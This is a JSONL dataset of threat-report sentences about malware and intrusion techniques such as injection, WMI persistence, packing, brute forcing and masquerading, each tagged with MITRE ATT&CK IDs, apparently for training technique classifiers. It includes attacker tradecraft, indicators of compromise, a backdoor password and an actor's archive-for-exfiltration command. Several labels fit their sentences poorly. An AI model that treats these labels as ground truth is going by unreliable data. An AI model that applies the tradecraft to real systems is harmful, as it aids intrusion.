{"text1":"They are known for \u201cliving off the land,\u201d meaning they use already available tools and software installed on the computer to operate, and once inside a target network, they will tailor their malware specifically to the target","labels":"['T1518.001']"}
|
|
{"text1":"Traditional antivirus software and other systems that rely on low-level indicators do not effectively detect and block common and pervasive malware","labels":"['T1518.001']"}
|
|
{"text1":"End users can benefit from security solutions such as\u00a0Trend Micro Home Security for Mac, which provides comprehensive security and multi-device protection against cyberthreats","labels":"['T1518.001']"}
|
|
{"text1":"As we discover new tools used by this group, we have consistently discovered overlapping artifacts with previously used tools and infrastructure","labels":"['T1518.001']"}
|
|
{"text1":"Mitigation Security and system\/IT administrators must practice due diligence in protecting their websites and web-based applications from threats that can undermine their security, and hijack them to do the bad guys\u2019 bidding\u2014delivering malware to their victims","labels":"['T1518.001']"}
|
|
{"text1":"Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat","labels":"['T1518.001']"}
|
|
{"text1":"AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products","labels":"['T1518.001']"}
|
|
{"text1":"Mitigation As this sample installs itself through the use of EternalBlue, the targeted protocol is SMB.\u00a0 Because of this, in order to best mitigate and avoid possible installations, you need your system updated to the latest security patches.\u00a0 Specifically, you\u2019d want to make sure that you have MS17-010 installed, as this is the security patch that patches the EternalBlue vulnerability","labels":"['T1518.001']"}
|
|
{"text1":"The malware queries the value for the flag BeingDebugged from PEB to check whether the process is being debugged.","labels":"['T1518.001']"}
|
|
{"text1":"The RIPTIDE exploit document drops its executable file into the C:\\Documents and Settings\\{user}\\Application Data\\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\ folder","labels":"['T1005']"}
|
|
{"text1":"In many payment card data breaches, a point-of-sale (POS) system is infected with malware that searches for specific processes in memory known to store card data in plain text","labels":"['T1005']"}
|
|
{"text1":"Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites.","labels":"['T1005']"}
|
|
{"text1":"Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts","labels":"['T1090']"}
|
|
{"text1":"In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server","labels":"['T1090']"}
|
|
{"text1":"This can be complemented by restricting direct internet access to the company\u2019s internal networks while using proxies to access external resources","labels":"['T1090']"}
|
|
{"text1":"Lateral Movement APT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP)","labels":"['T1021.001']"}
|
|
{"text1":"Containment provided by enclaving also makes incident cleanup significantly less costly.Configure firewalls to disallow Remote Desktop Protocol (RDP) traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary virtual private network (VPN) with lower privileges.Audit existing firewall rules and close all ports that are not explicitly needed for business","labels":"['T1021.001']"}
|
|
{"text1":"FIN6 used another set of compromised credentials with membership to additional groups in the domain to RDP to other hosts","labels":"['T1021.001']"}
|
|
{"text1":"To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip","labels":"['T1560']"}
|
|
{"text1":"This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension","labels":"['T1560']"}
|
|
{"text1":"On September 24, 2018, we observed an organization targeted by OilRig attempting to download a Zip archive from the following URL: hxxp:\/\/193.111.152[.]13\/[redacted]-ITsoftwareUpdate.zip This Zip archive contained a file named [redacted]-ITsoftwareUpdate.exe (SHA256: 5f42deb792d8d6f347c58ddbf634a673b3e870ed9977fdd88760e38088cd7336), which is a variant of the OopsIE Trojan we described in detail in a blog we published in September 2018","labels":"['T1560']"}
|
|
{"text1":"RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path \u201c\/FeedBack.php\u201d","labels":"['T1560']"}
|
|
{"text1":"RARW Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c\/FeedBack.php\u201d","labels":"['T1560']"}
|
|
{"text1":"When exfiltrating the keychain, the keychain field is used instead of data","labels":"['T1560']"}
|
|
{"text1":"Sometimes it is a high profile, legitimate site such as \u201cdiplomacy.pl\u201d, hosting a ZIP archive","labels":"['T1560']"}
|
|
{"text1":"The ZIP archive contains a RAR SFX which installs the malware and shows an empty PDF decoy","labels":"['T1560']"}
|
|
{"text1":"The entire command structure gets compressed with zlib and then encrypted using a custom stream cipher.","labels":"['T1560']"}
|
|
{"text1":"Internal Reconnaissance APT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance","labels":"['T1021']"}
|
|
{"text1":"Figure 4 \u2013 Backdoored authentication function in SSH server As you can see in Figure 4, this version of Dropbear SSH will authenticate the user if the password passDs5Bu9Te7 was entered","labels":"['T1021']"}
|
|
{"text1":"APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services","labels":"['T1110']"}
|
|
{"text1":"During our initial research into the TwoFace++ loader, we were unable to extract the embedded payload using the same brute forcing technique that we used on the initial TwoFace loader samples","labels":"['T1110']"}
|
|
{"text1":"We were able to brute force the actor-provided key using the inverse arithmetic operations using the embedded salt and embedded ciphertext, so we were able to extract the embedded webshells with ease","labels":"['T1110']"}
|
|
{"text1":"It then takes note of the infected machine\u2019s IP address, user, domain, hostname, OS and Service Pack, and the username and password combination that worked during the brute force routine","labels":"['T1110']"}
|
|
{"text1":"Its main functions are: Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels","labels":"['T1110']"}
|
|
{"text1":"Several of the tools are freely-available Windows utilities, such as Amplia Security\u2019s Windows Credential Editor. We also found a nearly complete set of the Microsoft SysInternals PsTools package, a copy of NLBrute (which attempts to brute-force passwords), installers for the commercial TeamViewer and AnyDesk remote support tools, and a number of utilities created by endpoint security vendors that are designed to remove their (and other companies\u2019) endpoint security and antivirus tools from a computer.","labels":"['T1110']"}
|
|
{"text1":"We found a brute-force tool called NLBrute , with configuration files that tell us it had been set up to use an included set of username and passwords to try to break in to machines that have Remote Desktop enabled","labels":"['T1110']"}
|
|
{"text1":"Common TCP ports 80 and 443 are used to blend in with routine network traffic","labels":"['T1571', 'T1043']"}
|
|
{"text1":"Resulting script on the compromised government websites Users were redirected to https:\/\/google-updata[.]tk:443\/hook.js, a BEeF instance, and https:\/\/windows-updata[.]tk:443\/scanv1.8\/i\/?1, an empty ScanBox instance that answered a small piece of JavaScript code","labels":"['T1571', 'T1043']"}
|
|
{"text1":"PUPY LOADER The Pupy RAT comes packaged by default with loaders that can run the RAT on a variety of platforms such as Windows, macOS, Linux and Android","labels":"['T1571', 'T1043']"}
|
|
{"text1":"In addition, although the 2017 campaign has been documented, during our research regarding MirageFox, we found a recently uploaded binary (6\/8\/2018) from the 2017 campaign, pretty much identical to a RAT mentioned in their RoyalAPT report, barely detected with only 7\/66 detections on VirusTotal.\u00a0 APT15 Code Reuse We found the new version of the RAT on VirusTotal hunting, by a YARA signature we created based off code only found in Mirage and Reaver, both attributed to Chinese government affiliated groups","labels":"['T1571', 'T1043']"}
|
|
{"text1":"These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)","labels":"['T1571', 'T1043']"}
|
|
{"text1":"KONNI is a RAT that is believed to have \u00a0been in use for over four years, with a wide array of functionalities, often leveraging free web hosting providers like 000webhost for its C2 infrastructure","labels":"['T1571', 'T1043']"}
|
|
{"text1":"Command and control To traverse the firewall, C2 traffic for most TG-3390 tools occurs over ports 53, 80, and 443","labels":"['T1571', 'T1043']"}
|
|
{"text1":"Upon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over port 80.","labels":"['T1571', 'T1043']"}
|
|
{"text1":"The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as\u201d over TCP port 443.","labels":"['T1571', 'T1043']"}
|
|
{"text1":"The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500","labels":"['T1571']"}
|
|
{"text1":"1\/12\/14 3\/5\/14 127.0.0.1 N\/A 3\/5\/14 3\/31\/14 103.24.0.142 Hong Kong 3\/31\/14 10\/27\/14 103.24.1.54 Hong Kong 10\/27\/14 11\/9\/14 127.0.0.1 N\/A 11\/9\/14 5\/25\/15 127.0.0.3 N\/A 5\/25\/15 Current as of this publication 127.0.0.1 N\/A Table 5","labels":"['T1571']"}
|
|
{"text1":"Figure 5 shows Phishery\u2019s output to the command that injects a URL into a file named \u201cgood_test.docx\u201d, which it will save the resulting file to \u201cbad_test.docx\u201d","labels":"['T1055']"}
|
|
{"text1":"It is capable of the following functions: Collect file\/folder\/drive information Download files and additional malware Launch\/terminate\/enumerate process Update configuration data Delete files Inject code from files to other running process Utilize proxy Open reverse shell Run in passive mode \u2014 instead of actively connecting to the command and control (C&C) server, the backdoor will open and listen to a port then receive commands through it Once the backdoor is loaded, it will then load the encrypted configuration file Auditcred.dll.mui\/rOptimizer.dll.mui to extract the C&C information and connect to it","labels":"['T1055']"}
|
|
{"text1":"As a result of all these steps, the last-stage Trojan is injected into svchost.exe\u2019s process memory","labels":"['T1055']"}
|
|
{"text1":"Process injection helps the malware avoid detection; however, review of active network connections show notepad.exe communicating to 185","labels":"['T1055']"}
|
|
{"text1":"This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process","labels":"['T1055']"}
|
|
{"text1":"Traps\u00a04.0 can be configured to protect the processes that are cited as being abused in this blog from loading malicious code","labels":"['T1055']"}
|
|
{"text1":"05 27 28 obj32.bin obj32.bin obj64.bin Shellcode template is used by Reinstaller\/Injector (rsXX.dll) and AudioRecorder4MetroApp (meXX.dll) for injecting into running processes","labels":"['T1055']"}
|
|
{"text1":"Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory","labels":"['T1055']"}
|
|
{"text1":"Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements","labels":"['T1055']"}
|
|
{"text1":"2e0361fd73f60c76c69806205307ccac, update.dll (MiniDuke), 425kb (internal name = \u201cUserCache.dll\u201c) 9e3f3b5e9ece79102d257e8cf982e09e, cache.dll (CozyDuke), 425kb (internal name = \u201cUserCache.dll\u201c) The two share identical export function names in their export directories, and the naming appears to be randomly assigned at compile time","labels":"['T1055']"}
|
|
{"text1":"*Command_Create&Inject:\u00a0 This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it","labels":"['T1055']"}
|
|
{"text1":"64) u= {B5B70BD7-87FC-499A-B4D1- 98163306F0D8} A GUID r= 1 Boolean value if the malware is running as injected code t= 8035187 Number of milliseconds the computer has been running Table 3","labels":"['T1055']"}
|
|
{"text1":"The loader will then inject a DLL backdoor into dllhost.exe","labels":"['T1055']"}
|
|
{"text1":"TClient is injected into dllhost.exe Malware Analysis\u00a0 wab32res.dll (FakeRun loader) loads TClient","labels":"['T1055']"}
|
|
{"text1":"Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services","labels":"['T1055']"}
|
|
{"text1":"Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3","labels":"['T1055']"}
|
|
{"text1":"It\u2019s also used to inject code into its target processes using the technique.","labels":"['T1055']"}
|
|
{"text1":"wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)","labels":"['T1047']"}
|
|
{"text1":"POSHSPY leverages two of the tools the group frequently uses: PowerShell and Windows Management Instrumentation (WMI)","labels":"['T1047']"}
|
|
{"text1":"Windows Management Instrumentation WMI is an administrative framework that is built into every version of Windows since 2000","labels":"['T1047']"}
|
|
{"text1":"WMI can be accessed using a variety of tools, including the Windows WMI Command-line (wmic.exe), or through APIs accessible to programming and scripting languages such as PowerShell","labels":"['T1047']"}
|
|
{"text1":"Windows system WMI data is stored in the WMI common information model (CIM) repository, which consists of several files in the System32\\wbem\\Repository directory","labels":"['T1047']"}
|
|
{"text1":"WMI classes are the primary structure within WMI","labels":"['T1047']"}
|
|
{"text1":"WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others","labels":"['T1047']"}
|
|
{"text1":"APT29 then created a WMI event subscription in order to execute the backdoor","labels":"['T1047']"}
|
|
{"text1":"In one instance, APT29 created a Filter named BfeOnServiceStartTypeChange (Figure 1), which they configured to execute every Monday, Tuesday, Thursday, Friday, and Saturday at 11:33 am local time.\u00a0 Figure 1: \u201cBfeOnServiceStartTypeChange\u201d WMI Query Language (WQL) filter condition The BfeOnServiceStartTypeChange Filter was bound to the CommandLineEventConsumer WindowsParentalControlsMigration","labels":"['T1047']"}
|
|
{"text1":"This excellent whitepaper by William Ballenthin, Matt Graeber and Claudiu Teodorescu contains additional information on WMI offense, defense and forensics","labels":"['T1047']"}
|
|
{"text1":"This presentation by Christopher Glyer and Devon Kerr contains additional information on attacker use of WMI in past Mandiant investigations","labels":"['T1047']"}
|
|
{"text1":"The FireEye FLARE team released a WMI repository-parsing tool that allows investigators to extract embedded data from the WMI repository and identify WMI persistence.","labels":"['T1047']"}
|
|
{"text1":"The payload uses WMI queries and checks running processes for evidence that the script may be executing within an analysis environment","labels":"['T1047']"}
|
|
{"text1":"Technique Description Fan Check The Trojan will perform the following WMI query: \u00a0 Select * from Win32_Fan \u00a0 According to MSDN, this query should return a class that provides statistics on the CPU fan","labels":"['T1047']"}
|
|
{"text1":"Leveraging Existing Windows Services to Deliver Malware Windows Management Instrumentation Console (WMIC) provides a command line interface to WMI","labels":"['T1047']"}
|
|
{"text1":"WMIC is a good tool for managing windows hosts and is widely favored by desktop administrators","labels":"['T1047']"}
|
|
{"text1":"This attack vector presents interesting problems, as blocking or restricting the use of WMIC may not be a feasible solution for some administrators","labels":"['T1047']"}
|
|
{"text1":"This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target.\u00a0 \u00a0The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment","labels":"['T1041']"}
|
|
{"text1":"The malware performs the following activities: Builds imports by dynamically loading APIs Decrypts strings needed for control server communications Performs control server communications Handles commands issued by the control server Uninstalls self from the system The malicious thread dynamically loads the APIs it needs at the beginning of its execution using LoadLibrary() and GetProcAddress()","labels":"['T1041']"}
|
|
{"text1":"In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim\u2019s machine and the C2 server","labels":"['T1041']"}
|
|
{"text1":"After obtaining the unique ID from the C2 server, the Trojan calls the \u201cSetAbStatById\u201d method to notify the C2 server of its status of \u201c1\u201d to notify the server it had successfully received the filename and file data","labels":"['T1041']"}
|
|
{"text1":"The r1.log file stores information for exfiltration","labels":"['T1074']"}
|
|
{"text1":"After Comnie has been copied to the %TEMP% directory, it will look for the presence of the \u2018DQuit.tmp\u2019 file in this path","labels":"['T1074']"}
|
|
{"text1":"Log.php validates the sender by User-Agent, saves the data in the \u201cUP\u201d server directory and stores the metadata in the mssql database for later reference","labels":"['T1074']"}
|
|
{"text1":"Note: aswrundll.exe is very similar to Microsoft\u2019s own rundll32.exe - it allows you to execute DLLs by calling their exported functions","labels":"['T1218.011']"}
|
|
{"text1":"The dropper installs 2 files:netwf.bat : executes netwf.dllnetwf.dll : the payloadThe dropper implements 2 persistence mechanisms:HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat fileCOM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.These 2 techniques have also been previously used by this actor.Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed","labels":"['T1218.011']"}
|
|
{"text1":"The loader component is executed via RUNDLL32.EXE","labels":"['T1218.011']"}
|
|
{"text1":"Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1","labels":"['T1218.011']"}
|
|
{"text1":"If the string is present, the malware executes the command RunDll32.exe","labels":"['T1218.011']"}
|
|
{"text1":"It loads the module with parameter vShow set to zero, which opens the application with a hidden window.\u00a0 Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exe","labels":"['T1218.010']"}
|
|
{"text1":"regsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry.\u00a0 \u00a0The script attempts to load the malicious module using regsvr with the run function.\u00a0 Procmon shows the malicious module loaded to the Avast process","labels":"['T1218.010']"}
|
|
{"text1":"The malicious modules in regsvr32.exe memory After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded","labels":"['T1218.010']"}
|
|
{"text1":"If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes: It will target unins000.exe if it is available","labels":"['T1218.010']"}
|
|
{"text1":"The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~, Irdsnhrxxxfery98.~, and module arqueiro.\u00a0 The downloaded modules found in regsvr32.exe as detected by the Cybereason platform","labels":"['T1218.010']"}
|
|
{"text1":"After selecting a payload URL, the script will create copies of certutil and regsvr32 to the temp directory for later use","labels":"['T1218.010']"}
|
|
{"text1":"8 Making a copy of certutil and regsvr32 Certutil.exe (a copy is renamed to certis.exe by the trojan) is normally used in a windows environment to manage certificates, but in this case, it is used by the second stylesheet to download the malware payloads","labels":"['T1218.010']"}
|
|
{"text1":"11 AV detection If there is no Avast install present, the script proceeds to the final .dll execution using regsvr32 and quits","labels":"['T1218.010']"}
|
|
{"text1":"After unpacking the module, it is packed with an additional inner packer Pe123\\RPolyCryptor","labels":"['T1027.002']"}
|
|
{"text1":"BlackEnergy2 was eventually seen downloading more crimeware plugins \u2013 a custom spam plugin and a banking information stealer custom plugin","labels":"['T1027.002']"}
|
|
{"text1":"Flash object in the .docx file, stored in uncompressed format The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits","labels":"['T1027.002']"}
|
|
{"text1":"The PCODE of the virtual machine is packed with the aplib packer","labels":"['T1027.002']"}
|
|
{"text1":"While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed","labels":"['T1027.002']"}
|
|
{"text1":"The MSIL file contains the packed core payload in its .Net resource section","labels":"['T1027.002']"}
|
|
{"text1":"Two modifications are made to UPX version 3.91: The magic bytes UPX! in the UPX header are replaced with ASS7, The decompressed code and strings sections are XORed with 0x01","labels":"['T1027.002']"}
|
|
{"text1":"Figure 6: Difference between a stock UPX packed file and the modified one A patch for UPX is available on ESET\u2019s malware-research Github repository that allows unpacking Keydnap\u2019s backdoor with the usual upx -d","labels":"['T1027.002']"}
|
|
{"text1":"See the following for more information and examples of false flags being used in cyberattacks: Wave your false flags! \u2026or the Nightmares and Nuances of a Self-Aware Attribution Space OlympicDestroyer is here to trick the industry Malware description The malware was first seen packed with VMProtect; when unpacked the sample didn\u2019t show any similarities with previously known malware","labels":"['T1027.002']"}
|
|
{"text1":"(Source: Dell SecureWorks) In SWCs analyzed by CTU researchers, the threat actors added the Dean Edwards packed JavaScript code shown in Figure 9 to the end of a legitimate website's menu page","labels":"['T1027.002']"}
|
|
{"text1":"First, the sample is UPX packed","labels":"['T1027.002']"}
|
|
{"text1":"Data Exfiltration The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate","labels":"['T1115']"}
|
|
{"text1":"Cadelspy\u2019s main payload contains its back door functionality, allowing the threat to carry out the following activities: Log keystrokes and the titles of open windows Gather clipboard data and system information Steal printer information and any documents that were sent to be printed Record audio Capture screenshots and webcam photos Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker\u2019s C&C servers","labels":"['T1115']"}
|
|
{"text1":"Scan the network environment of the infected machine; checks for availability of specific ports on servers that share the same internal and external subnet mask (i.e 255.255.0.0\\16)","labels":"['T1046']"}
|
|
{"text1":"Mimikatz The threat actors also uploaded tools to scan for and exploit potential vulnerabilities in the network, such as the well-known SMB vulnerability patched in commonly exploited by EternalBlue to move laterally to other systems on the network.","labels":"['T1046']"}
|
|
{"text1":"What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not","labels":"['T1036']"}
|
|
{"text1":"Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 Table 5","labels":"['T1036']"}
|
|
{"text1":"Filename SHA256 Description 7za.exe dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229 7-Zip 17.01 beta hb.exe 3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62 Hobocopy nbt.exe c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e nbtscan 1.0.35 rx.exe a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e IntelliAdmin Remote Execute v1.0 tardigrade.exe fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392 Tardigrade application","labels":"['T1036']"}
|
|
{"text1":"In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive: YYYY-MM-DD hh:mm:ss quser YYYY-MM-DD hh:mm:ss C:\\windows\\temp\\svchost.exe a -m5 -v2000m -hp{password} -inul -r \"{destination_file.rar}\" \"{multiple user directories linked to the victim's projects}\" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst The threat actors typically rename the encrypted RAR archives","labels":"['T1036']"}
|
|
{"text1":"SHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff MD5 1ff40e79d673461cd33bd8b68f8bb5b8 Compiled 2017.08.06 11:32:36 (GMT), 2.22 Type I386 Windows Console EXE Size 101 888 Instead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding exported functions, the developers decided to use a standalone executable started by events.exe with the following parameters: Parameter Description -scr Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration","labels":"['T1036']"}
|
|
{"text1":"The file is named netwf.dat","labels":"['T1036']"}
|
|
{"text1":"The account names visually look similar to legitimate government organization names or other trusted third-party entities","labels":"['T1036']"}
|
|
{"text1":"The initial overlap was based on the filename wmssl.exe, which was seen as an executable name that Cannon would move the wmssl.txt attachment to install and execute a secondary payload","labels":"['T1036']"}
|
|
{"text1":"Writing executables to a randomly-selected directory under Program Files, and naming the EXE to match the chosen directory name, or, if that fails, writing the executable to a system-generated temporary file name, using the EXE extension 3","labels":"['T1036']"}
|
|
{"text1":"The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program","labels":"['T1036']"}
|
|
{"text1":"The \u201cVPN Client\u201d is a legitimate Juniper VPN software bundled with Helminth, a malware in use by the OilRig threat agent: JuniperSetupClientInstaller.exe 6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link) If the victim downloads and installs the file, their computer would get infected, while the legitimate VPN software is installed","labels":"['T1036']"}
|
|
{"text1":"For example, we analyzed a DropIt sample (SHA256: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which was saved to \u201c%TEMP%\\flash_update.exe\u201d that was a legitimate Flash Player installer","labels":"['T1036']"}
|
|
{"text1":"Figure 10: Network traffic to download final payload (words.exe) Once executed, the file performs the following activities: Drops a copy of itself in %AppData%\\svchost.exe\\svchost.exe and drops an XML file, which contains configuration information for Task Scheduler (as shown in Figure 11)","labels":"['T1036']"}
|
|
{"text1":"Firstly, the reason this has been named MirageFox instead of just Mirage, is because in the Export directory for the modules, the name field is filled with a string MirageFox_Server.dat","labels":"['T1036']"}
|
|
{"text1":"The wave against the government entity (June 26) also involved a simple PE file attachment (SHA256: d948d5b3702e140ef5b9247d26797b6dcdfe4fdb6f367bb217bc6b5fc79df520) using the filename tafahom.exe","labels":"['T1036']"}
|
|
{"text1":"After the .NET PE file has been run, we observed the same behavior as the above QUADAGENT sample of dropping a PowerShell script with the filename SystemDiskClean.ps1 alongside a VBScript file with the same name","labels":"['T1036']"}
|
|
{"text1":"The Downloader After the exploit or script executes, the system downloads install.exe, which has the following metadata: MD5 5a0c4e1925c76a959ab0588f683ab437 Size 46592 bytes Compile Time 2014-11-19 08:55:10Z Import Hash 6b8611f8148a6b51e37fd68e75b6a81c The file install.exe attempts to write two files (doc.exe and test.exe) to the hard-coded path \u201cC:\\Users\\Public\u201d, which fails on Windows XP because that path is not present by default","labels":"['T1036']"}
|
|
{"text1":"One example of these samples is given below: SHA256:6500636c29eba70efd3eb3be1d094dfda4ec6cca52ace23d50e98e6b63308fdb The file is a self-extracting RAR, which is a common delivery mechanism for PlugX particularly when the eventual payload will be sideloaded by a legitimate executable","labels":"['T1036']"}
|
|
{"text1":"Filename qrat.exe File Size 1093120 bytes MD5 c05e5131b196f43e1d02ca5ccc48ec0e SHA1 f28c592833f234c619917b5c7d8974840a810247 Notes Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll","labels":"['T1036']"}
|
|
{"text1":"Filename Part-I.doc File Size 11349102 bytes MD5 92942c54224cd462dd201ae11a560bb8 SHA1 85a21624df2211af3daf05c86a3fbea8271059d3 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe","labels":"['T1036']"}
|
|
{"text1":"Filename Part-II.doc File Size 10156713 bytes MD5 e32668e569362c96cc56db368b7e821e SHA1 dadc493abbe3e21610539e1d5a42f523626a6132 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe","labels":"['T1036']"}
|
|
{"text1":"When the shellcode embedded within the malicious EPS is executed, the following three files are dropped: %PROGRAMDATA%\\Microsoft\\DeviceSync\\VMwareCplLauncher.exe %PROGRAMDATA%\\Microsoft\\DeviceSync\\vmtools.dll %PROGRAMDATA%\\Microsoft\\DeviceSync\\MSBuild.exe In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload","labels":"['T1036']"}
|
|
{"text1":"The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool","labels":"['T1036']"}
|
|
{"text1":"These digital certificates are often issued in the name of rogue and legitimate companies to avoid arousing suspicion from researchers and incident responders","labels":"['T1036']"}
|
|
{"text1":"In one instance we observed, one of the initial malware delivered to the victim, RATANKBA (TROJ_RATANKBA.A), connects to a legitimate but compromised website (eye-watch[.]in:443, a mobile application-selling site) from which a hack tool (nbt_scan.exe) is also downloaded","labels":"['T1036']"}
|
|
{"text1":"One archive sample analyzed by CTU researchers contained a legitimate PDF file, a benign image of interest to targets (see Figure 8), and an HttpBrowser installer disguised as an image file","labels":"['T1036']"}
|
|
{"text1":"The legitimate owaauth.dll file resides in %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\ while CTU researchers have observed the backdoor using the same filename in the %ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\ directory","labels":"['T1036']"}
|
|
{"text1":"It was pretending to be an Adobe flash player update installer on a compromised website to lure users to click for the execution","labels":"['T1036']"}
|
|
{"text1":"Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors.","labels":"['T1036']"}
|
|
{"text1":"likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor","labels":"['T1036']"}
|
|
{"text1":"Using a custom User Agent string or the system's User Agent string derived from urlmon.dll 7","labels":"['T1543.001']"}
|
|
{"text1":"Persistence Once started, the Keydnap backdoor installs a plist file in \/Library\/LaunchAgents\/ if it has root privileges or $USER\/Library\/LaunchAgents\/ otherwise to achieve persistence across reboots","labels":"['T1543.001']"}
|
|
{"text1":"Figure 6 shows the Glimpse server responding to an inbound beacon from the Glimpse agent and sending a command whoami","labels":"['T1033']"}
|
|
{"text1":"The screenshot also shows the Glimpse server receiving the results of the whoami command executed by the agent","labels":"['T1033']"}
|
|
{"text1":"The webshell will save the archives locally to the server in the C:\\Users\\Public\\Libraries\\Recorded\\Files folder, each with a filename with the following structure: [IP address]_c$_Users_[username]__[Desktop-Documents-Downloads]_[year]-[month]-[day]-[hours]-[minutes]-[seconds].7z It is likely that the threat actors use this functionality to rapidly check for new files created by users on the network","labels":"['T1033']"}
|
|
{"text1":"This document was also the first of the mid-November cluster which used the user\/USER author name instead of Joohn, further supporting the scenario of the document being copied between systems","labels":"['T1033']"}
|
|
{"text1":"The same code snippets are combined into a second stage JavaScript in \u201cC:\\Users\\<User Name>\\\u201d","labels":"['T1033']"}
|
|
{"text1":"The username appears to be attacker specified and has occurred in 2017 Bankshot samples","labels":"['T1033']"}
|
|
